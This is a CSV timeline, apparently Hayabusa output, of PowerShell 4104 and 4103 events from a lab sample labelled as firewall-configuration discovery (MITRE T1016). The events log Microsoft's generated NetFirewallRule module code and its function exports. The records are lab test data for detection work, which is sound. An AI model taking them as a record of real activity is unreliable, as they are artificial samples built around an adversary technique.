'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value =",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { 
[object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_m,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ethodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = 
${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
